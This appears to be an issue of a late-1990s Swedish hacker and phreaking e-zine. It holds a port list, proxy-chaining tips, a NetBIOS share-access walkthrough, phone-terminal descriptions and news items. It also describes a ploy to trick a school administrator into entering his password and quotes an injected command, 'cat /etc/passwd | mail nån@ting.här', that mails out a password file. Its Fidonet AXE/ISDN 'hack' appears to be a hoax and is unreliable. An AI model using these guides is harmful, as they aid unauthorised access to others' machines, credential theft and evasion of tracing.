va?] echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote qotd 17/udp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver rlp 39/udp resource # resource location name 42/tcp nameserver name 42/udp nameserver whois 43/tcp nicname # usually to sri-nic domain 53/tcp nameserver # name-domain server domain 53/udp nameserver nameserver 53/tcp domain # name-domain server nameserver 53/udp domain mtp 57/tcp # deprecated bootp 67/udp # boot program server tftp 69/udp rje 77/tcp netrjs finger 79/tcp link 87/tcp ttylink supdup 95/tcp hostnames 101/tcp hostname # usually from sri-nic iso-tsap 102/tcp dictionary 103/tcp webster x400 103/tcp # ISO Mail x400-snd 104/tcp csnet-ns 105/tcp pop 109/tcp postoffice pop2 109/tcp # Post Office pop3 110/tcp postoffice portmap 111/tcp portmap 111/udp sunrpc 111/tcp sunrpc 111/udp auth 113/tcp authentication sftp 115/tcp path 117/tcp uucp-path 117/tcp nntp 119/tcp usenet # Network News Transfer ntp 123/udp ntpd ntp # network time protocol (exp) nbname 137/udp nbdatagram 138/udp nbsession 139/tcp NeWS 144/tcp news sgmp 153/udp sgmp tcprepo 158/tcp repository # PCMAIL snmp 161/udp snmp snmp-trap 162/udp snmp print-srv 170/tcp # network PostScript vmnet 175/tcp load 315/udp vmnet0 400/tcp sytek 500/udp biff 512/udp comsat exec 512/tcp login 513/tcp who 513/udp whod shell 514/tcp cmd # no passwords used syslog 514/udp printer 515/tcp spooler # line printer spooler talk 517/udp ntalk 518/udp efs 520/tcp # for LucasFilm route 520/udp router routed timed 525/udp timeserver tempo 526/tcp newdate courier 530/tcp rpc conference 531/tcp chat rvd-control 531/udp MIT disk netnews 532/tcp readnews netwall 533/udp # -for emergency broadcasts uucp 540/tcp uucpd # uucp daemon klogin 543/tcp # Kerberos authenticated rlogin kshell 544/tcp cmd # and remote shell new-rwho 550/udp new-who # experimental remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem rmonitor 560/udp rmonitord # experimental monitor 561/udp # experimental garcon 600/tcp maitrd 601/tcp busboy 602/tcp acctmaster 700/udp acctslave 701/udp acct 702/udp acctlogin 703/udp acctprinter 704/udp elcsd 704/udp # errlog acctinfo 705/udp acctslave2 706/udp acctdisk 707/udp kerberos 750/tcp kdc # Kerberos authentication--tcp kerberos 750/udp kdc # Kerberos authentication--udp kerberos_master 751/tcp # Kerberos authentication kerberos_master 751/udp # Kerberos authentication passwd_server 752/udp # Kerberos passwd server userreg_server 753/udp # Kerberos userreg server krb_prop 754/tcp # Kerberos slave propagation erlogin 888/tcp # Login and environment passing kpop 1109/tcp # Pop with Kerberos phone 1167/udp ingreslock 1524/tcp maze 1666/udp nfs 2049/udp # sun nfs knetd 2053/tcp # Kerberos de-multiplexor eklogin 2105/tcp # Kerberos encrypted rlogin rmt 5555/tcp rmtd mtb 5556/tcp mtbd # mtb backup man 9535/tcp # remote man server w 9536/tcp mantst 9537/tcp # remote man server, testing bnews 10000/tcp rscs0 10000/udp queue 10001/tcp rscs1 10001/udp poker 10002/tcp rscs2 10002/udp gateway 10003/tcp rscs3 10003/udp remp 10004/tcp rscs4 10004/udp rscs5 10005/udp rscs6 10006/udp rscs7 10007/udp rscs8 10008/udp rscs9 10009/udp rscsa 10010/udp rscsb 10011/udp qmaster 10012/tcp qmaster 10012/udp -==- Gå vidare -==- MyWord II (IP Faking) - Myword är en serie textfiler som är väldigt informativa, dom kan bla. hämtas på swehack.cjb.net och i en av dem står det om IP Spoofing eller IP Faking välj själv vilket du tycker låter bäst. A short overview of IP spoofing: PART I Simple Spoofing (Non blind) - Är så pass känd så den finns lite här och där på olika hemsidor, det är bara söka eller maila mig om du vill ha den. A short overview of IP spoofing: PART II Advanced spoofing (Blind) - Är så pass känd så den finns lite här och där på olika hemsidor, det är bara söka eller maila mig om du vill ha den. Understanding IP Addressing http://www.3com.com/nsc/501302.html. Avancerad information om hur IP addresseringen är uppbyggt och hur den fungerar. Simple Attack Against TCP Tutorial om IP Hijacking. Security Problems in the TCP/IP Protocol Suite Beskriver olika hål och attacker i och mot TCP/IP, högt rekomm- enderad. -==- Efterord -==- Jaja, det var bara en del av min privata TCP/IP utbildning, jag kan nästan garantera att det kommer mera avancerad information om TCP/IP och olika andra internet kommunikations protokoll inom snaraste framtid. Om du tycker att jag skrev med en aning annorlunda svenska så beror det på att jag inte på topp fattar allt själv, efter som jag just genomgår min privata utbildning, så du skulle ju kunna kalla artikeln som en uppsats. Men utan betyg så att säga. Alla flames skickas till /dev/null men gärna seriösa kommentarer och tips hur jag skulle kunna göra artikeln bättre uppskattas. Allt skickas till keytrace@usa.net. En del delar är översatta och en del rippade faktiskt. Men allt är inte helt rippat så kom inte och klaga, jag har faktiskt skrivit källförteckning. -==- Tack Till -==- Gazzaud, pewp och apotygma -==- Källor -==- The Basics of TCP/IP Introduction to the Internet Protocols TCP SYN Flooding and IP Spoofing Attacks TCP packet fragment attacks against firewalls and filters OSI reference model The TCP Header Fields +-------------------------------------------------------------+ | Läs lokala filer i NT [Overmarzz] | +-------------------------------------------------------------+ Den här texten kommer att beskriva ett enkelt sätt att få tag i windows/nt lösenord (.pwl) På min skola så är det lösenord på bios'en, dos går inte att köra (det kommer upp en text som säger att man ska prata med adminen), vi har bara "Logga av" och "Program" i startmenyn, I.E är spärrat för att läsa lokala filer och vi har inga ikoner på skrivbordet. Det kan tyckas som om det vore svårt att få en pwl fil men INTE. Jag testade allt, bla word. Word visade sig vara ett prakt exempel på hur man kan läsa lokalt i NT :) Man kunde klicka på c:\ men det hände inget, så jag tryckte på favoriter. vips så var c:\windows\fav- oriter uppe och därifrån klickade jag ett steg tillbaka så jag hamnade i c:\windows. Ok tänkte jag, det var kul. Men vad tjänar jag på det? Jag har ännu inte hunnit testa detta jag ska berätta nu och har hört att inloggnings lösen inte sparas i pwl ... i så fall..synd! men alla fall...Dra ut den fula TP kablen och spring till adminen som en idiot J = Jag L = Lam Admin J - Dator 11 funkar inte..man kan inte logga på L - Oj bäst JAG tar en titt.. I dator salen så kommer adminen först pröva logga på.. L - Nähä, det var konstigt, jag som är 37331 :/ J - Humm..(stirrar på sladden) Ska inte den sitta i? L - Jo, heh..(glad och samtidigt stolt att han löste problemet) J - Pröva om det funkar nu L - Well kid..You read my mind .. :) Adminen prövar logga på med sitt user/pass .. OM nt SPARAR inloggnings lösenordet så är det kört för honom :) annars så kan man ju alltid pilla i systemet :) Ok, jag inser att denna filen är lam, men den bör läsas med lite ironi +-------------------------------------------------------------+ | Wingates [Overmarzz] | +-------------------------------------------------------------+ (Denna txt'n är översatt, den riktiga finns på hackersclub) Wingates är ett bra alternativ för säker hacking Många wingates loggar allt men sen finns det ju även anonyma sådana (hur skulle man annars klara sig :) Denna sortens spoofing kallas non-blind spoofing Du har en ip fast du går igenom andra servrar Blind IP spoofing är otroligt avancerat.. Det är när man förutser TCP sequence number av ett 'trusted' TCP session mellan två två andra machiner och hijack'ar själva session genom att modifiera hans IP adress och "injecerar" ett binart commando ex "cat /etc/passwd | mail nån@ting.här". Och det är svårt... Men om du verkligen vill lära dig om det så finns det 2-3 bra txt filer om det på min hemsida Hur du använder wingates rätt Vi antar att jag har 3st wingates 24.231.12.1 = A 24.103.43.5 = B 24.234.13.2 = C (Om du har windows) Som alla vet så är ju telnet clienten (windows) det ända verktyg som man använder mycket vid "hacking" (kanske lite sta- rkt ord) Connecta till A i telnet Prompten kommer att se ut så här: WinGate> Här kan du connecta vidare till andra servrar bra tänker du... Men är man paranoid som jag så kan det bli bättre connecta nu till wingate B WinGate>24.103.43.5 Och samma prompt kommer upp.. Nu kan du connecta till wingate 3 osv, för att till sist connecta till den server som du tänkte ..... eller vad du vill göra.. Din burk -> Din isp -> A -> B -> C -> till den du vill till.. Detta kommer att få effekten att din ip blir svår att spåra Bara A ser din riktiga IP - B B ser A's IP - C ser B's IP osv.. Om du vill connecta till andra portar så kan du självklart göra det genom denna enkla förändring WinGate>121.433.23.1:port_nummer +-------------------------------------------------------------+ | Säkerhets hål i Netbios [Knash] | +-------------------------------------------------------------+ System: Windoze 95, NT Z-Attack = Personen som attackerar :) Det har upptäckts att någon med ett Win95 system kan "remotly" skaffa sig tillgång till delade (shared) mappar på Win95/NT system. Z-Attack andvänder sig av nbtstat för att lista de aktuella netbios sammanträdande datorerna. Z-Attack lägger till dator namnet i sin c:/Windows/lmhosts. Han söker efter datorns namn som han la till i lmhosts. Han söker efter datorn och förhoppningsvis visar en ikon sig. Då får han access till alla icke lösenords skyddande mappar. Så hur utför du detta praktiskt ? - Steg 1 Här är kommandot du ger som indata i ditt MSDOS skal ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Om det nu är en netbios session som du ser så ger nbtstat utdata genom att visa de olika datorerna i en lista. De första namnet du ser. - Steg 2 Öppna c:/Windows/lmhosts och lägg till: ipaddress namnpådatorn ipadress : ip adressen till dator som du vill komma åt. namnpådatorn: namn på datorn som du vill komma åt. Spara det och ta bort din egen netbios session. - Steg 3 Ge kommandot som sedan borde ge purge succsessfu- l, om inte så är det väl kanske något nätverks fel eller nåt. - Steg 4 Nu kan du gå och söka efter datorn (sök på datorns namn) om den nu visar en söt liten ikon, dubbelklicka på den och sen SKA du se alla delade mappar. | Lösning på problemet | Jag tänke vara snäll mot alla LAMA NÄTVERKS ADMINISTRATÖRER och säga att det finns en lösning till detta. Visserligen är netbi- os problemet ganska omfattande. Men det bästa du kan göra är att sätta lösenord på alla delade mappar. +-------------------------------------------------------------+ | nato.int, whitehouse.gov hacked [Axxezz] | +-------------------------------------------------------------+ Det har nu blivit känt att www.nato.int samt www.whitehouse.gov har blivit hackade utav ryska hackers som en protest mot NATO:s bombningar mot det forna Jugoslavien. Det verkar som tom de me- st bevakade sidorna fortfarande lätt kan hamna i farozonen så länge dessa hackers har den rätta motivationen. NATO har ännu inte uttalat sig om detta hack och Vita Huset påstår att det var pga en hardvaru krash som sidan var nere nästan 2 dygn. Källa: SAFER +-------------------------------------------------------------+ | Enkelt om Terminaler [Knash] | +-------------------------------------------------------------+ Jag tänke faktiskt ta upp lite om terminaler. Jag ska förklara vad dom andvänds till och hur dom ser ut, inte mycket mera än så. Målgrupp: Extrema wannbee phreakerz (men inte så många kanske vet vad de riktiga namnen för terminalerna är och inte många har sätt oranga (LME:OR) terminaler och inte heller turkosa terminaler (3M:or) -=- Flames skickas ju till /dev/null såklart -=- + Terminal i helhet + LSA Plus (Den vita terminalen) + OLDschool (Den svarta terminalen) + LME (Den oranga terminalen) + 3m (Den turkosa terminalen) -=o[ Terminal i helhet ]o=- Det finns väl olika namn, personligen kallar jag dem för Term- inaler men det finns dom som kallar dem Centraler också. Terminalen sammankopplar flera linor för att sen skicka ut dem i en i en enskild kabel som går till C-Skåpen som kopplar ihop 100 linor som sen skickas i en enskild kabel till Kocentratio- ns Centralerna. -=o[ LSA Plus ]o=- Har funnits ett tag sitter i de grå Kopplingsboxarna som är gjorda av metall (idiotförklaring) Även kallade Metall Jappsa- re. Metall Jappsaren är ett fördelningsskåp av telelinor. Men till själva terminalen som sammanbinder kablarna (telelinorn- a) En LSA Plus klarar att sammankoppla max 20 linor och är 12cm lång, 2cm hög och 1,5cm bred. LSA Plus är faktiskt de namnet som telia andvänder, det är själva produktnamnet. Populärt bland Phreakers kallas termina- len faktiskt enkelt och oseriöst för Vit terminal. Jag hade faktiskt inte tänkt mig att förklara allt för mycket, se Målgrupp i början av artikeln. -=o[ OLDSchool ]o=- Den mest kända terminalen självklart, har funnits sen farfar lekte i sandlådan. Finns som standard i de runda Kopplingsbox- arna med svart topp. Terminalen är helsvart med utstående skruvar som sitter på plintar. Terminalen sammankopplar som max 10 linor. OLDsch00l är 10,5 cm lång, 1,2cm hög och 9mm bred. -=o[ LME ]o=- LME Terminalen är helorange och nästanlikdant byggda som den svarta men lite mindre och att skruv plintarna sitter en bit in i själva terminalen, nackdelen blir då att man inte kan knäppa på krokodil klämmor, men annars kan man ju andvända nålar eller liknande (andvänd kreativiteten) Den oranga LME Terminalen kan sammankoppla som max 10 linor och är 9,3cm lång, 1,7cm hög och 2cm bred. Hmm som jag sagt heter ju terminalens synonym betäckning LME, hmm, LME är ett gammalt moder-bolag till Ericsson (LME=LM Ericsson) LM ericss- är ett gammalt telebolag som sysslade med växlar och shit. Men den vita LME terminalen är relativt ny. Hur går det ihop ? -=o[ 3m ]o=- 3m Terminalen är smart byggt, jag hittade faktiskt den i ett låst källarrum (en korridor på 200m) den satt fast i ett fett magasin med en massa terminaler. Den sammankopplar som de fle- sta max 10 linor, också storlek och skit: 7cm lång, 2cm hög och 17mm bred. +-------------------------------------------------------------+ | GSM kan läsa av Elmätare [Knash] | +-------------------------------------------------------------+ Trådlös energiavläsning via GSM-nätet. Med ny teknik kommer det bli möjligt. Telias utvecklingsbolag Wireless Maingate AB ska utveckla tekniken tillsammans med Enermet som är ledande leverantör av utrustning som avläser energiförbrukning. Genom att läsa av sina kunders elmätare via GSM kommer energiföretag- en spara mycket tid och pengar. De slipper skicka ut en person som ska göra mätningarna. Enermet har sedan tidigare tecknat ett avtal med Ericsson gällande GSM-terminaler för energimätar- e. För att kunna erbjuda en helhetslösning för energiavläsning via GSM krävdes en operatör som kan hantera de nya krav på kommunikationslösningar som den här marknaden ställer. MainGate är fokuserade på tjänsteutveckling för maskiner. Med MainGate som samarbetspartner få vi tillgång till en bred kompetens inom telecom och IT, det tillsammans med Telias rikstäckande GSM-nät stärker våra möjligheter att lyckas, säger Bengt Sundling, VD på Enermet AB. Telia tror att marknaden för GSM-lösningar för maskin till maskin kommer växa. De beräknar att 30 procent av GSM-trafiken utgöras av mobil data år 2001. Rippat från: www.mkf.se/nyheter/ Detta kan ju betyda att lite roliga security holes bildas. Kanske kommer det sitta SIM kort i elmätaren, eller ännu enkla- re i själva boxen. +-------------------------------------------------------------+ | Cellulär styrning, update [Knash] | +-------------------------------------------------------------+ Angåenda artikeln "Promenad: Cellulär styrning" i Outlaw-04 så har jag(vi) studerat lite. Har hittat en artikel i "Veckans no- tiser om Mobil" som du finner ovan. Boxen tyder starkt på att det är en elmätare. För det första så sitter ett fett märke där det står "Mätarskåpet skall hållas låst" mätarskåp (hmm, har kanske något med elmätare att göra?) Sen så ser den i princip ut likadan med siffor och dyl. Det sitter även en massa proppar som i ett mätarskåp där elmätaren brukar befinna sig. +-------------------------------------------------------------+ | Lite rippat om AXE från Fidonet [Knash] | +-------------------------------------------------------------+ ___________________________________________________ # Snabba överföringar över det digitala telenätet # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Insänd av Håkan Andersson, 2:201/601 Av Björn Felten, 2:203/208 Som ni förmodligen känner till, så kan Telias operatörer logga in på AXE- stationerna via fjärranslutningar för att utföra det mesta som behövs. Detta sker via det digitala telenätet, och går naturligtvis inte att göra utifrån de analoga inkopplingar- na. Men vad Telia kanske inte har tänkt på, är att även vanliga ab- onnenter med ISDN ligger ute på det digitala nätet. Det går således utmärkt att via ett vanligt ISDN-abonnemang fixa en hel del roliga saker på AXE - stationen. Protokollet, som användes är en helt vanlig Kermit, fast med reverserad CRC. En av de roligare finesserna är den, som användes när man felanmäler ett abonnemang. Då kopplar operatören, som tog emot din felanmälan, om din AXE- station så att den ett kort ögonbl- ick ger en helt digital anslutning hela vägen fram till alla dina telefoner och modem. Detta för att kunna utföra mätningar, som inte är möjliga via det analoga nätet. Du har helt enkelt fått en ISDN-lina under ett kort ögonblick! Detta kallas för ServiceIngång till LinjeLyssnaren, eller SILL. Detta, tillsammans med det serviceläge som alla modem med V34 har, och som ibland yttrar sig även vid vanlig drift, genom att modemet plötsligt börjar låta som ett flipperspel, som har tiltat, ger intressanta möjligheter. Serviceläget är avsett för att modemtillverkaren skall kunna prova modemen snabbt och enkelt. Det går (naturlig- tvis) inte att komma in i detta läge från modemet självt, genom någon AT-kod, utan initieras genom en speciell sekvens under handskakningens första 500ms, och som genereras av den speciel- la testutrustning, som tillverkaren har. Denna handskakningen kommer för övrigt alltid först, så en sådan connect tar högst en halv sekund att etablera. Tyvärr går det inte att komma ifrån det fruktansvärda oljudet, så detta är ingenting för den som sover med basen under huvudkudden... :) I detta serviceläge går modemet helt digitalt, och modulerar alltså inte signalen för transport över det analoga nätet, utan det är rena ettor och nollor som sändes. Och detta med den max- imal a hastighet, som modemets handskakning medger. I den interna testloopen (enbart modemet) ligger det på kring 2M bps, och i den externa är det den anslutna serieporten, som sätter gränsen. De flesta serieportar idag klarar 115k bps, men vissa klarar ända upp till 230k bps. Detta är alltså den överförings- hastighet, som blir resultatet. Det senare motsvarar ungefär 40000 cps eller en Mbyte på 25 sekunder... Nu har jag äntligen fått klart mitt lilla hack, som fixar allt detta från ISDN-sidan. Det ringer alltså upp AXE-stationen, ko- pplar om den till digitalt läge ända fram till valfritt V34-mo- dem, öppnar modemet i testläget och skickar/ hämtar sedan filer o.dyl. i den maximala Rippat från: Fidonet +-------------------------------------------------------------+ | Teleutrustning som klarar år2000 [Knash] | +-------------------------------------------------------------+ Onödiga artiklar/textfiler finns överallt. Varför inte förstör- a och göra dem fler. Nedan är en lista på telefonväxlar och lite teleutrustning som är år2000 kompatibla. Rippat och klart ! PBX SOM KLARAR ÅR 2000 Leverantör (System) Produkt Kommentar Alcatel (PBX) A4400, A4200E Direcom Nitsuko NX64 Direcom Teleste 2000/2200 Doro (PBX) Doro AX-8, AX-8M, AX-32, AX-32M, Doro Trippel 10 Doro Median Doro Link Doro DX-E Doro System Cordless Doro System 2/24, 2/320 Doro Miniväxel 1/4, 2/6, Doro ISDN 2/8 Doro Index, Doro Index DECT COBS System 2000 Siemens Hicom 112, 118 Goldstar-Licencia GSX 208, (PBX) GSX 408/816, GSX 1224, GSX 1832/3672/36112, GHX 820, GDK 162/186, GDK 100, GDK FP II Nortel (PBX) Meridian R16, Meridian R18, Meridian R20, Meridian R21, Meridian R22, Companion (Trådlöst) Philips (PBX) Sophos-s50 ssw-640, Sophos-s100 ssw-640, Sophos-s250 ssw-640, Sophos-s1000 ssw-640, Sophos-s55, ssw-200,205 Sophos-s255, ssw-200,205 Sophos-2500,ssw-700-730 Sophos-1025, ssw- 730 Telia (PBX) se lista på: www.telia.se överst på sidan Övriga system som klarar år 2000 Leverantör (System) Produkt Kommentar Direcom (Snabbtelefonväxel) ITT511 Ericsson (Snabbtelefonväxel) ASE43X Ericsson (Snabbtelefonväxel) ASA10101 Ericsson, AsaCorn (Snabbtelefonväxel) ASA10103 ASA10105 ASA10107 Goldstar-Licencia (CTI) PBX-link, PBX popup, PBX telecon. Nortel ( ACD) Meridian Max rel. 8 Nortel (Samtalsdebitering) Meridian CCR rel. 6.03 Listan är rippad från: Landstingsförbundet +-------------------------------------------------------------+ | Copyright [Knash] | +-------------------------------------------------------------+ Jupp, copyright och inte copyfight faktiskt. Ni kan ju rippa en artikel från zinet och skriva källa om ni snackat med mig om det. Zinet får spridas lite hit och dit så länge det stannar oändrat. +-------------------------------------------------------------+ | Prenumeration [Knash] | +-------------------------------------------------------------+ -==- S-T-A-R-T-A P-R-E-N-U-M-E-R-A-T-I-O-N -==- Skicka ett litet mail till keytrace@usa.net med Subscribe O-I i subjekt fältet. -==- A-V-S-L-U-T-A P-R-E-N-U-M-E-R-A-T-I-O-N -==- Skicka ett litet mail till keytrace@usa.net med Unsubscribe O-I i subjekt fältet. +-------------------------------------------------------------+ | eX1t() | +-------------------------------------------------------------+ ___ . . .' `. , . _/_ | ___ , _ / | | | | | | / ` | | | | | | | | | | | ` ^ ' `.__.' `._/| \__/ /\__ `.__/| \/ \/ I N F O R M A T I V A Heretics Inc. Ascii Development group. editor cotact: knash@linux.nu